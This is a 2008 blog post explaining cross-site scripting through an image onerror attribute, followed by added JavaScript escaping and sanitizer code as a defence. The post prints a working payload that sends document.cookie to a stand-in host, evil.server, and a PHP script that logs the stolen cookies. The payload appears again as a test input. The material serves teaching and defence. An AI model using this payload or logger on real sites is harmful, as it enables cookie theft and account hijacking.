XSS with Img OnError attribute
March 19th, 2008 by Aaron
So much of my time is spent worrying over the src and href attributes of images and links that I sometimes forget about the other attributes.
Imagine an image whose src contains nothing that would be flagged, yet can still make a remote request that logs the user's cookie. That's right, this can be done using the 'onerror' attribute of an image.
What you need to do is create an image whose src is obviously broken or empty. When the image fails to load, the browser fires an error event for that element and runs whatever is in its onerror attribute. Put code there that sets the image's src to a remote URL with document.cookie appended. The remote script logs every request it receives and then displays an image.
Check out the code below:
Source page without proper filtering:
    <html>
    <body>
    <h1>test</h1>
    <h2>asdf</h2>
    <img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" />
    </body>
    </html>
Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php:
    <?php
    $image_path = 'test.jpg';
    header('Accept-Ranges: bytes');
    header('Content-Length: ' . filesize($image_path));
    header('Keep-Alive: timeout=15, max=2469');
    // serve the image so the browser gets a normal response
    echo file_get_contents($image_path);
    // record the request URI, which carries the cookie from the query string
    file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']);
    ?>
Easy as that. Just another reminder to properly filter user-submitted content before it is rendered.
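As an added defensive example (not code from the original post), here is what "proper filtering" looks like in JavaScript against the exact payload above: contextual output encoding for ordinary comment text, plus an allowlist sanitizer for sites that let users post an image. The function names, the example URLs and the regex-based attribute parsing are my own; a production site should use a real HTML sanitizer such as DOMPurify rather than regexes.

```javascript
// Encode the five HTML metacharacters so untrusted text placed in an HTML
// body is rendered literally. The post's payload becomes inert text.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Allowlist sanitizer for the case where users may legitimately post an
// image. Only src is kept, only http(s) URLs are accepted, and the tag is
// rebuilt from scratch so no original attribute (such as onerror) survives.
// Anything that is not a lone <img ...> tag is treated as plain text.
// Hypothetical demo helper: regexes are not an HTML parser, use a real one.
function sanitizeImgTag(untrusted) {
  const tag = /^<img\b([^>]*)>$/i.exec(untrusted.trim());
  if (!tag) return escapeHtml(untrusted);
  // Tolerate double- or single-quoted src values; unquoted ones are rejected.
  const srcMatch = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)')/i.exec(tag[1]);
  const src = srcMatch ? (srcMatch[1] !== undefined ? srcMatch[1] : srcMatch[2]) : '';
  let url;
  try { url = new URL(src); } catch (e) { return ''; } // empty or relative src: drop the tag
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '';
  return `<img src="${escapeHtml(url.href)}">`;
}

// Render one user comment into the page body. Images are only rebuilt via
// the allowlist when the site has opted in; otherwise everything is escaped.
function renderComment(untrusted, allowImages = false) {
  return allowImages ? sanitizeImgTag(untrusted) : escapeHtml(untrusted);
}

// Constructed sample inputs: the payload from the post and a benign image.
const PAYLOAD = '<img src="" onerror="this.src=\'http://evil.server/exploit.php?\'+document.cookie" />';
const BENIGN = '<img src="https://example.org/cat.png" alt="cat">';
```

Run in Node: renderComment(PAYLOAD) yields encoded text with no tags, and renderComment(PAYLOAD, true) yields an empty string because the empty src is rejected before any attribute is copied.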
Tags: javascript, PHP, security
This entry was posted on Wednesday, March 19th, 2008 at 6:34 pm and is filed under PHP, javascript, security.